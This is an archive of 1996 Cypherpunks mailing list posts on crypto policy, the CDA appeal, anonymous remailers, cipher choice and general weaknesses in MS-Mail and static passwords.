To: cypherpunks@toad.com
Subject: Re: Ga Law/No False Identity
Message-ID: <960627174301_565508240@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-27 17:15:15 EDT, nowhere@alpha.c2.org writes:

>:  It shall be unlawful for any person, ... to transmit any data 
>:  through a computer network ... if such data uses any individual 
>:  name, ... to falsely identify the person, ... 
>:
>----------snip----------
>:  -- Robert Costner
>:     Electronic Frontiers Georgia
>:     rcostner@intergate.net
>
>Spamming aside, this strikes at my privacy and choice of anonymity. 
>
>
falsely id a person?? Well it seems to me ya just wanna get the messages
OUTTA there and arent trying to 'act' as that person in the sense that you
are posing to NO person that you really are that person.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 29 Jun 1996 08:20:08 +0800
To: cypherpunks@toad.com
Subject: New mixmaster up: jammix
Message-ID: <4qvaui$plc@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've finally gotten around to installing mixmaster.  I'll install a Type 1
tomorrow or next week.  Any suggestions on which (I hope this isn't a
religious war...)?

jammix mix@cypherpunks.ca c2178bf3018c062a8d0fabd066e50ed9 2.0.3

- -----Begin Mix Key-----
c2178bf3018c062a8d0fabd066e50ed9
258
AATgExB26IdURw+itvFEQsWjv/mQFgg3Tu2avLU2
fdW55aqKqKDeiIWf8nY24HG+i08s65cp8zCm2w7E
ZvzgcBxLQu91Sg1UbQlkYMYqx8NpeKjxnkU+5KqC
mswqrAbOn0qqcmNz7/3TsGS0p22+Dsw9rLjwDk4o
udzR2maCUTuDvwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdMvBUZRiTErSPb1AQEOFwQAlseh5bV8OaBgH/eIqNbxm7whFoOfjdDN
2AjcX17G1VsX/T/qMVXLle0KJ7Ac+e4f5RMcU5iAjEueU06jor4xEJOqDDQsIn2w
56niRMFICStAm2babEu1RSbgwLIZ35lA0l3ybO/g9AijDTFD9PD+lIyKX+vH7fXB
ey4TQOAC1XM=
=ZdGA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve O <privsoft@ix.netcom.com>
Date: Sat, 29 Jun 1996 09:02:40 +0800
To: cypherpunks@toad.com
Subject: Crack for DOS
Message-ID: <1.5.4.16.19960627202318.3cf78a08@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Guys,

1. A colleague of mine was interseted in in demonstrating the unix password
cracking program Crack on a windoze system. Where can one be found if one
exists?

2. If you were looking to compare single key block ciphers like Blowfish,
DES, 3xDES etc. Which one would be considered the best for implementation in
a software security package, assuming maximal key lengths irreverant of the
governmental restrictions.

3. Does anyone have info re: S/MIME implementation time table into the
Netscape browser?

Thanks
SO
 Steve O.

"True Utopia can only be reached by an uncensored and secure Internet,
	True Chaos can only be reached by the government,
		True love can only be reached in the movies."
S.O.

"Bang your head, Metal Health will drive you mad!"
Quiet Riot

"Welcome my friend, Welcome to The Machine"
Pink Floyd

"Lonelyness and Emptiness;
 Love and Fulfillment;
 Are all but flashes 
 in the eye of the storm
 of our tormented soul."
S.O.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 29 Jun 1996 07:31:09 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <v02140b00adf8924b5fe4@[198.115.179.228]>
MIME-Version: 1.0
Content-Type: text/plain


        On Cypherpunks-L, Vin McLellan wrote:

>>...  The real threat is incompetent, poor-trained DoD
>>system administrators -- and a class of computer-illiterate senior managers
>>who define "system security" and routine administration as a marginal
>>expenses and scorn readily available options like one-time passwords as too
>>complex for the military mind.

        Bill Frantz <frantz@netcom.com> responded:

>Public key authentication could go a long way toward solving the military
>and contractor's security problems.  However, they won't use public key
>authentication for unclassified systems until it is available in "COTS"
>(Commercial, Off The Shelf) software.  And it won't be available there
>until it can be exported as well as sold domestically.  Catch-22

        I love PKC with all its promise, but you overstate (and IMHO,
attribute inappropriately) the barriers that slow the adoption of one-time
password authentication in the military... and many other more highly
regarded IS environments.

        Security Dynamics (a client of mine) has sold a million SecurID
two-factor OTP tokens internationally -- and its ACE/Server installations
are freely exported to 20-odd nations, even with its embedded DES code.
There is no barrier against exporting OTP authentication systems, either
two-factor tokens or software!  Bellcore's s/key is available world-wide in
both the popular freeware versions and Bellcore's commercial client/server
version -- and the US Navy  developed and circulates widely its own
freeware rewrite of the s/key OTP code: OPIE.

        Free and commercial OTP code has been effectively COTS for years!
I would be greatly surprised if there has been a published report on the
state of security in the US computer or communications infrastructure
anytime in the past five years which has not highlighted the promise of
OTPs to plug the single most eggregious systemic vulnerability in the
installed base of networked computer systems: static, unchanging, user
passwords vulnerable to anyone with a wayward sniffer utility or (to
collect them by the bushel) able to logon to a target site with one of
those stolen passwords to drop a trojan.

        Without trustworthy user authentication there is no meaningful
computer security, period!  Sen. Sam Nunn, who is now chairing the
Congressional hearings on Security in Cyberspace, is a bright guy --
although he is reputed to be utterly innocent of basic computer skills.
Yet Sam Nunn could have pulled off the total penetration of the 30 USAF
computer systems at Rome Labs -- the tale of incompetence witnesses
described so luridly at his recent hearings -- with a couple of hours of
simple tutorials from anyone on this List.

        The British 16 year-old who did it just religiously collected
passwords -- working the Net from his 25 MHz 486 SX pc with a 170 Megabyte
hard drive.   The "Datastream Cowboy" liked to hack .MIL systems because --
as he was quoted explaning, in an analysis by the Nunn's subcommittee staff
-- they are "so insecure."

        CERT, DISA, NIST, OTA, GAO, even NSA -- they've all issued stacks
of reports with the same redundant recommendations.  Even CERT, fer cripes
sake!  Reusable passwords are the hole in the dyke!  It's a mantra among
the security pros; has been for years: "Shift to OTPs for meaningful
security in networked systems."

        Yes, there are still threats to the communication links without
network encryption -- but with OTPs, even those vulnerabilities become
vastly more managable.  With universal adoption of OTPs for multi-user
systems, 80 percent (??) of the problem would disappear and we could worry
(as we must) about bad code in Sendmail and other widely-used apps and
system products. Then, we could blame our sense of vulnerability on the
self-interested spooks and the short-sighted politicians who deny us and
our culture the personal security of widespread quality encryption.

        But it's not that simple.  Access to encryption is one issue;
separate and distinct from the issue of the adoption of one-time password
technologies.  OTP user authentication -- and the vast increase in the
security and integrity of our computers and networks it could bring to our
government and private sector information systems -- is _Not_ dependent
upon the government releasing encryption (PKC or other) from its spooky
bondage.

        You don't need PKC for quality authentication.  They are
complementary technologies (thus, the proposed merger of Security Dynamics
and RSA) but they are not the same.  They are not even necessarily
interdependent.  You can have weak authentication with utterly secure
network encryption.

        No, in this case, the blame is spread far more widely.  Yes, DoD
and other meta-institutions have been slow to acknowledge and act upon the
obvious solution to their biggest and most obvious vulnerability.  Security
is still seen as a marginal item in the budget -- not something that must
be designed into both the technology or implicit in its responsible
management.

        But they've been able to get away with it because the hardware
vendors and big software companies -- the very firms which now harp on ITAR
denying them the international market -- have been so hesitant to risk
their margins by designing security into their number crunchers.  And
they've been able to get away with that because the whimpy class of
professionals who design, impliment, and manage the computer installations
upon which our nation (many nations!) and our industrial culture depend has
been unable to get it together to define or condemn irresponsible,
unprofessional stewardship of these assets.

        People carp about soul-less lawyers.  Money-grubbing MDs.  Sell-out
CPAs.  But has there ever been a class of technical professionals so adept
at denying all responsibility for the proper and responsible management of
the power and assets they control as we professional technocrats of the
computer culture?  By contrast, lawyers, MDs, etc., are bastions of probity
and social and professional responsibility!

        How low do you have to sink to find some unacceptable level -- some
level of incompetent system administration that carries the burden of
liability? A standard beneath which a professional's peers would judge him
or her reckless and irresponsible, lacking due care, unprofessional?
Frankly, I've never been able to find out.  (And, to judge by the lack of
judicial condemnation of corporate and public managers for mismanagement of
other people's electronic assets, neither have the Courts.)

        Think of it: our culture could be about to be irretrievably
transformed by a series of laws drafted by the American subculture of spys
(both the police and the real spooks) and passed by legislators stampeded
into reckless action by a heartfelt but hysterical sense that our
computer-based national infrastructure is vulnerable to bored teanagers
just  bright enough to scoop up the static passwords that circulate
unprotected on our networks; to run CRACK against readily-available
"secured" password files full of what everybody knows are guessable
passwords; or to slip through system backdoors announced world-wide by CERT
and FIRST alerts... but never patched, closed, or fixed.

        Sad.  No -- it's absurdly tragic!  Nunn's subcommittee will leap
from considering poor Datastream's vaunted outlaw prowess to offer, in the
weeks to come, yet another proposal for guaranteed government access to
private sector crypto keys.  (And this one might fly with the Nation -- all
those Nations -- At Risk.)

        Somehow, firing, fining, demoting, or making liable for damages,
any designated system administrator who can't find the time (within, say, a
week) to apply vendor-circulated patches for vulnerabilities announced by
CERT is too extreme a proposal.  OTPs are too simple a solution. Better to
toy with the potential for repression than risk the revolutionary idea of
personal and professional responsibility.

        They say People ultimately get what they deserve.  Computer
professionals better pray that this is not the case.


                        _Vin

        (Zounds!  This was to be merely my two cents, but then the wind
caught my sails. Apologies for the overheated bandwidth.)


         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@clever.net (eric traudt)
Date: Fri, 28 Jun 1996 11:06:37 +0800
To: TOIV_B@a1.eop.gov
Subject: A favor
Message-ID: <v02140b00adf8bc10f17b@[204.249.244.13]>
MIME-Version: 1.0
Content-Type: text/plain


To: Barry J. Toiv, High Exalted  Muckety Muck White Castle Press and
Database Spokesman

Dear Sir,

I  am researching the topic of rent seeking in government and could make
good use of your "Big Brother" database. From press reports I've heard it
contains payment records and invoiced items for political transactions.
This should enable me to calculate  prices and inflation rates for
ambassadorships etc.

If it's not too much trouble could you email me a copy of the 20,000 name
database before my thesis is due?

P.S. Please give me the "FBI clean" version, I don't need the really
dangerous bits.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Fri, 28 Jun 1996 08:15:15 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
In-Reply-To: <199606271845.LAA13527@netcom7.netcom.com>
Message-ID: <19960627192347.16856.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz writes:
 > At  4:57 AM 6/27/96 -0400, Vin McLellan wrote:
 > >...  The real threat is incompetent, poor-trained DoD
 > >system administrators -- and a class of computer-illiterate senior managers
 > >who define "system security" and routine administration as a marginal
 > >expenses and scorn readily available options like one-time passwords as too
 > >complex for the military mind.
 > 
 > Public key authentication could go a long way toward solving the military
 > and contractor's security problems.  However, they won't use public key
 > authentication for unclassified systems until it is available in "COTS"
 > (Commercial, Off The Shelf) software.  And it won't be available there
 > until it can be exported as well as sold domestically.  Catch-22

So a Pentagon Computer Security Analyst might reasonably make the case
that the ban on exportable crypto is hurting National Security just as
much as, or more than, it helps.

Why hasn't someone made that case?  If they have, why hasn't it
succeeded?

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software sells packet driver support     | PGP ok
521 Pleasant Valley Rd. | +1 315 268 1925 voice | Corporations persuade;
Potsdam, NY 13676       | +1 315 268 9201 FAX   | governments coerce.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sat, 29 Jun 1996 09:04:39 +0800
To: cypherpunks@toad.com
Subject: Fight-Censorship Dispatch #15: Government Appeals CDA!
Message-ID: <v01510103adf8ed692839@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain




-----------------------------------------------------------------------------
                    Fight-Censorship Dispatch #15
-----------------------------------------------------------------------------
                     Justice Department Appeals!
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------


June 27, 1996

WASHINGTON, DC -- With no fanfare and no hype, the Justice Department
yesterday faxed a 39-word statement to Senator Exon saying they will
appeal their loss in the Philadelphia case.

The consolidated lawsuits of ACLU v. Reno and ALA v. DoJ resulted in a
victory for the plaintiffs earlier this month after a three-judge panel
granted a preliminary injunction preventing the DoJ from enforcing the
Communications Decency Act.

I didn't know about this letter until about 15 minutes ago, when Bruce "I
wrote the CDA" Taylor showed up outside my office for a HotWired Club
Wired chat at 9 pm this evening.

Taylor was grinning. "I got a scoop for you guys. You owe me. Nobody but
Senator Exon would have gotten this letter out of the department."

For a while, netizens were worrying that the DoJ might appeal the New
York American Reporter v. Reno case, a narrower and weaker appeal that
only challenged part of the CDA.

This letter means that the ACLU/ALA case is definitely going to the
Supremes, which will likely result in a decision a year from now.

Stay tuned for more reports, and check in at Club Wired for the Taylor
transcript. He says it'll be a "roast." We'll see...

-----------------------------------------------------------------------------


Office of the Deputy Attorney General
Washington, DC 20530

June 26, 1996

The Honorable J. James Exon
United States Senate
Washington, DC 20510

Dear Senator Exon:

With regard to your request as to the status of the appeal on ACLU v.
Reno, this letter is to inform you that the Department of Justice will
file a Notice of Appeal on or before the July 2 deadline.

Sincerely

[signed]

Jamie S. Gorelick
Deputy Attorney General

-----------------------------------------------------------------------------

Mentioned in this CDA update:

  HotWired Club Wired:
    http://www.hotwired.com/eff/
  Deputy Atty Gen Jamie Gorelick's speech slamming Net, calling for controls:
    http://fight-censorship.dementia.org/dl?num=2733
  Bruce Taylor's amicus "finger" brief in NYC CDA lawsuit:
    http://fight-censorship.dementia.org/dl?num=2736

  Fight-Censorship list   <http://fight-censorship.dementia.org/top/>
  Rimm ethics critique    <http://www.cs.cmu.edu/~declan/rimm/>
  Int'l Net-Censorship    <http://www.cs.cmu.edu/~declan/international/>
  Justice on Campus       <http://joc.mit.edu/>

This document and previous Fight-Censorship Dispatches are archived at:
  <http://fight-censorship.dementia.org/top/>

To subscribe to future Fight-Censorship Dispatches and related
announcements, send "subscribe fight-censorship-announce" in the body
of a message addressed to:
  majordomo@vorlon.mit.edu

Other relevant web sites:
  <http://www.vtw.org/>
  <http://www.cpsr.org/>
  <http://www.epic.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>
  <http://www.ala.org/>
  <http://www.eff.org/>

-----------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com (Will Rodger)
Date: Sat, 29 Jun 1996 09:41:16 +0800
To: cypherpunks@toad.com
Subject: ALERT - DOJ TO APPEAL CDA says Interactive Week
Message-ID: <v01510100adf8a9427970@[38.11.99.32]>
MIME-Version: 1.0
Content-Type: text/plain


 From a draft to be posted shortly at http://www.zdnet.com/intweek


By Will Rodger
Wahington Bureau Chief
Inte@active Week

The Department of Justice will appeal to the Supreme Court a federal court
decision that stayed enforcement of a controversial Internet indecency law,
sources close to the court challenge told Inter@ctive Week Thursday.
Department of Justice lawyers gave Sen. J. James Exon, D-Nebr. news of the
appeal in a three-line letter delivered to the law's chief sponsor
Wednesday. A copy of the letter was obtained by Inter@ctive Week.
Exon welcomed the news. "We needed the Justice Department to make a final
decision on the appeal, which I am pleased that they have done with the
full support of the White House," Exon said. "This will now go to the
Supreme court and I believe we will get a more thoughtful decision out of
the top court than what the court in Philadelphia ruled."
Attorneys on the other side seemed equally pleased.
"This is wonderful news because it means the Supreme Court will have a
chance to speak on these issues," said Mike Godwin, staff counsel of the
Electronic Frontier Foundation. "We feel certain the Supreme Court will
uphold the lower court's finding that the statute is unconstitutional."
The Communications Decency Act, passed as part of telecommunications reform
legislation last February, would have banned indecent images and speech
from any areas open to minors on the Internet. Under the law, operators of
Internet sites would have been required to segregate indecent content into
adults-only areas that required a credit card or other form of positive
identification for access.
Drafters based their restrictions in large part on regulations governing
broadcast media which still prohibit indecency over the airwaves, as well
as some local ordinances which require segregation of indecent materials
from others.
But a coalition of civil liberties groups, for-profit and non-profit
organizations challenged the Act in a consolidated suit before a federal
court in Philadelphia. The law, plaintiffs claimed, was unconstitutional
since it set up restrictions on indecent but constitutionally protected
speech.
The CDA, moreover, would place a "chilling effect" on free speech as
Internet users unnecessarily limited their speech in order to comply with
an impermissibly vague law, plaintiffs claimed. In place of the CDA,
plaintiffs suggested evolving technologies in the hands of responsible
parents would better protect children while preserving adults' First
Amendment rights.
The Philadelphia Court agreed with the plaintiffs on all counts, striking
down the law June 12. In a unanimous decision, a three-judge panel found
that the democratic nature of  the Internet entitled it to at least as much
protection as print, traditionally the least regulated of all media. The
court also found that the statue was impermissibly vague and would thus
unnecessarily restrict speech. The court also ruled the government had
failed to show the law was enforceable with current technology.

Cheers.

Will






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin Q. Brown" <kqb@c2.org>
Date: Sat, 29 Jun 1996 11:30:43 +0800
To: cypherpunks@toad.com
Subject: secure WWW on UNsecure servers
Message-ID: <199606280438.VAA05479@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I know several people who want to share private information on
some web pages but do not trust any publicly-accessible web server
not to leak the information on those pages.   The normal IP
address or password-based web page protection mechanisms thus
are not sufficient since they assume that the server is secure
from non-web-based mechanisms for retrieving the pages.  Also,
encryption schemes such as SSL will not solve the problem because
they protect only against interception between the server and
the client, not at the server itself.  Instead, it looks like
the web pages must reside on the server in encrypted form.

How might one arrange for these encrypted web pages residing on an
(unsecure) server to get decrypted only at the client's machine?
This should work as transparently as possible for the user;
except possibly for a userid/password query it should look like a
normal web browsing session.  For now, we can assume that the
decrypted web pages contain only HTML and images in .gif format.

Might this best be done with some combination of special MIME
types and helper applications or plug-ins?  Has someone already
done it?  Thanks.

    Kevin Q. Brown
    kqb@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucifer Remailer Operator <lucifer@dhp.com>
Date: Sat, 29 Jun 1996 09:25:06 +0800
To: cypherpunks@toad.com
Subject: John Grubor and me
Message-ID: <Pine.LNX.3.91.960627221432.29950A-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Just for the record, I am not John Grubor and had never even heard of him
before I did an Altavista search on his name earlier today.  The concept that
some net.loon like Grubor would get another account with DHP to run an
anonymous remailer for whatever reason is laughable.  From what I have read,
Grubor spams newsgroups quite often, something I have not done nor plan on
doing.  I was expecting people to be posting paranoid rantings about how I
am obviously a spook...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 29 Jun 1996 10:18:25 +0800
To: Steve O <privsoft@ix.netcom.com>
Subject: Re: Crack for DOS
Message-ID: <199606280620.XAA24528@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:17 PM 6/27/96 -0700, you wrote:
>2. If you were looking to compare single key block ciphers like Blowfish,
>DES, 3xDES etc. Which one would be considered the best for implementation in
>a software security package, assuming maximal key lengths irreverant of the
>governmental restrictions.

"Best" really depends on your criteria for goodness....

DES has been thoroughly explored, and people have a good idea of how
strong it is and how easy it is to implement well in software.
It's not strong enough (you can do a bit better than 2**55 brute force tries,
and 2**55 isn't enough given modern computers), but you can take care 
of that by using Triple DES, preferably the 3-key form, which
is strong enough for the forseeable future.  It's also annoyingly
slow in software form, having been designed for bit-twiddling hardware,
but there are well-optimized versions on the usual archive servers.

Blowfish is new, so perhaps there are flaws that 10-20 years of analysis
will find.  But it's pretty good - it's small, fast in software,
and has an annoyingly slow key-schedule which makes it difficult to
use brute-force crackers on.  It's got variable key lengths.

RC4 and RC5 are also new, fast, have variable key lengths, and appear to
be quite strong if used with adequate choices of parameters.
RC5 is patented; RC4 was a trade secret, since leaked, and you may
get flak for using the _name_ RC4 in a commercial product.
40-bit keys make it exportable but easily brute-forced;
128-bit keys are quite strong.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Distract Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 29 Jun 1996 10:09:18 +0800
To: cypherpunks@toad.com
Subject: Re: Ga Law/No False Identity
Message-ID: <199606280630.XAA16312@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


>>:  It shall be unlawful for any person, ... to transmit any data 
>>:  through a computer network ... if such data uses any individual 
>>:  name, ... to falsely identify the person, ... 

You don't have to falsely identify yourself to do spam canceling -
in addition to the header saying
        From: Spammer <president@whitehouse.gov>
you can put in a header with your real name
        Really-From: Mario Greymist <mario@luigi.com>
or put your real name in the body, or a nym you use (e.g. Cancelpoodle)
with an explanation that you're cancelling the spam posted by the
spammer.

>>Spamming aside, this strikes at my privacy and choice of anonymity. 
Well, of course - it's an offensively bogus law for a variety of reasons :-)

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Distract Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 29 Jun 1996 10:22:29 +0800
To: cypherpunks@toad.com
Subject: Re: MS-Mail Security
Message-ID: <199606280631.XAA19392@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Leo WONG Wing-yan <wywong2@cs.cuhk.hk>
> In> I would like to gather informations of whether the MS-Mail server
> In> is  secure or not, is anyone heard of somebody, say, disguise 
> In> as other user or read other user e-mail?

You have to look at the whole environment.  MSMail typically runs
on MS-DOS / Windows PCs, on a network using Microsoft file server
protocols over TCP/IP, so it has all the vulnerabilities of that
environment.  (It can run over Novell Netware instead, which has
a somewhat more secure file server, but the system is still vulnerable.)
The easy attack is to use a sniffer or other ethernet eavesdropping
software to listen for MSMail messages on the LAN - they're not
sent encrypted.  It also runs over dialup, and the dialup and
LAN versions rely on a user-typed login name and password for security,
but don't require that the password meet any minimum standards
for length (empty passwords work just fine.)

MSMail is typically used for two different kinds of business applications -
a purely internal mail system that doesn't connect to the outside world,
or gatewayed to SMTP or UUCP to connect to other locations.
I don't know how secure the gateways are, but the places I've seen them
used they certainly haven't been reliable, and generally have been heavily
hacked on by the users to make them do what the users want, which probably
doesn't add to either the reliability or the security.  The mail client
has its own set of problems, such as choking on messages with more than
30KB of message body.  My purely personal non-official opinion is that 
it's the third worst mail system I've ever used.  (IBM PROFS is the worst,
and I watched someone use the original Prodigy 1200-baud 24x40 lines with
advertising on every page nonsense as well.)

harka@nycmetro.com
>I'd also like to know how secure the MS-Mail files are (*.mmf). 
>They are password protected and should be encrypted but 
>does anybody know how secure?

For those of you who aren't familiar with MSMail, the .mmf file
is the big hulking file that MSMail keeps all your mail in,
including new mail and mail filed in folders (you _can_ split it
so your Inbox resides in one .mmf on a mail server and all
your other mail folders are in one file on your PC.)  
The main effects are 
- if the file gets corrupted (perhaps by a bad disk block, or 
because the "operating system" crashed while you were using MSMail), 
you can't read the undamaged pieces,
- if you received a message that the MSMail client can't handle,
like a large text message, you can't read it directly from the mail file
using a text editor like Emacs.

I haven't tried to crack it, but the experience of people who've
cracked other Microsoft Office encryption (e.g. Word, Excel)
has been that it's been pretty wimpy.  It does prevent casual
users of your PC or server from reading your email by looking
at the file with an editor or by using the MSMail client without
the password, but I'd be very surprised if it kept out a professional
who wanted to take the time to attack it carefully.




#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Distract Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leo WONG Wing-yan <wywong2@cs.cuhk.hk>
Date: Fri, 28 Jun 1996 04:43:17 +0800
To: cypherpunks@toad.com
Subject: MS-Mail Security
Message-ID: <Pine.SOL.3.91.960627231233.11957A-100000@sol25.cs.cuhk.hk>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,


    I would like to gather informations of whether the MS-Mail server is 
secure or not, is anyone heard of somebody, say, disguise as other user 
or read other user e-mail?


    Thanks a lot

Best regards
Leo Wong









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sat, 29 Jun 1996 10:44:44 +0800
To: cypherpunks@toad.com
Subject: Re: MS-Mail Security
Message-ID: <960627232515_144630593@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-06-27 21:39:21 EDT, harka@nycmetro.com writes:

>I'd also like to know how secure the MS-Mail files are (*.mmf). They are
>password protected and should be encrypted but does anybody know how secure?
>
>Harka
>___ Blue Wave/386 v2.30 [NR]
>
>

as far as I know.. the encryption used on them is weak. I think ive seen a
generic cracker for these on the internet. I dont think MS is going to put
the time into a good VERY secure encryption for this.. because then
aftermarket things wouldnt be bought!!! hehe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 29 Jun 1996 10:06:18 +0800
To: vinnie moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: crypto and bagpipes [NOISE]
In-Reply-To: <v0300740dadf8d550a116@[17.203.21.75]>
Message-ID: <199606280352.XAA06868@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



vinnie moscaritolo writes:
> >>>A Missive From: David Kovar (kovar@nda.com)
[...]
> >>>Mr Brooks, the piper, has denied the charge, citing a case in 1746,
> >>>where bagpipes were declared to be instruments of war, not musical
> >>>instruments, and a subsequent Act of Parliament which specifically
> >>>stated that they were weapons. He claims he wasn't playing a musical
> >>>instrument, but practising with a weapon!
> >>>
> >>>The imagination boggles if his claim is successful!

No one who has heard sustained bagpipe playing can deny the fact that
bagpipes are indeed an instrument of war, with no legitimate place in
peaceful everyday society.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Sat, 29 Jun 1996 10:11:54 +0800
To: cypherpunks@toad.com
Subject: INFO: Photos, testimony, and audio transcripts of 6/26 crypto hearing, get it now!
Message-ID: <199606280419.AAA08511@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

         MISSED THE CRYPTO HEARINGS?  HEAR THE TRANSCRIPT WITH REALAUDIO,
            READ THE TESTIMONY WITH ANY BROWSER, VIEW THE FUZZY PHOTOS

                              Date: June 28, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        News
        Security And Freedom through Encryption forum: July 1, 1996
        (that's MONDAY!)
        How to receive crypto-news
        Press contacts

-----------------------------------------------------------------------------
NEWS

The second hearing on the Burns/Leahy Pro-CODE bill (S.1726) brought down
the house in the Senate this past Wednesday.  With a number of firsts
(first cyber-simulcast of a Senate hearing, first time testimony was submitted
purely through a WWW page) this is a monumental event.

But wait!  If you missed this standing room only event, you can still attend
virtually by visiting the hearing wrapup page at http://www.crypto.com/
There you will find the two hour RealAudio transcripts of the audio portion
of the day, links to online copies of many witnesses written testimony, and
some photos taken at the hearing.

-----------------------------------------------------------------------------
ATTEND THE SAFE FORUM - JULY 1, 1996 STANFORD CALIFORNIA

On July 1, 1996, in the heart of California's Silicon Valley at Stanford
University, members of Congress, prominent computer industry leaders and
privacy advocates will meet to discuss the need to reform U.S. encryption
policy.

The event is FREE and open to the public, but space is limited and is going
fast.  To find out more, and to reserve your free ticket, visit the SAFE
Forum Web Page at:

  http://www.crypto.com/safe

CONFIRMED SPEAKERS INCLUDE:

Among other prominent industry leaders, cryptographers, privacy advocates
and members of Congress, confirmed speakers include"

Industry Leaders and Cryptographers        Members of Congress

* Marc Andreeson, Netscape                 * Rep. Anna Eshoo (D-CA)
* Jim Bidzos, RSA                          * Rep. Tom Campbell (R-CA)
* Eric Schmidt, Sun Microsystems           * Rep. Zoe Lofgren (D-CA)
* Brad Silverberg, Microsoft               * Sen. Conrad Burns (R-MT)
* Phil Zimmermann, PGP Inc                   * Sen. Patrick Leahy (D-VT)
* Matt Blaze, AT&T                         * Sen. Larry Pressler (R-SD)
* Bruce Schneier, Counterpane Systems

Privacy Advocates and Legal Experts:

* Michael Froomkin, U. of Miami Law School
* Jerry Berman, Center for Democracy and Technology
* Grover Norquist, Americans for Tax Reform (invited)
* Ken Dam, U. of Chicago Law School (invited)

This event will be "cybercast", with full audio and still video clips,
live online with the help of MediaCast.  Details on the cybercast are
available at http://www.crypto.com/safe/

SAFE FORUM SPONSORS

This important discussion on the need for an alterative policy to protect
privacy and security and promote commerce on the Global Information
Infrastructure is being made possible by the generous support of the
following companies and public interest organizations:

America Online
Americans for Tax Reform
AT&T
Business Software Alliance
Center for Democracy and Technology
Center for National Security Studies
Commercial Internet eXchange
CompuServe Incorporated
Computer Professionals for Social Responsibility
Cylink Corporation
EDS
Electronic Frontier Foundation
Electronic Messaging Association
Electronic Privacy Information Center
Information Technology Association of America
IEEE - USA
MediaCast
Media Institute
Microsoft Corporation
Netcom Online Communication Services
Netscape Communications Corporation
Novell, Inc.
Oracle Corporation
Pacific Telesis
PGP Inc.
Prodigy, Inc.
Progress and Freedom Foundation
Securities Industry Association
Software Publishers Association
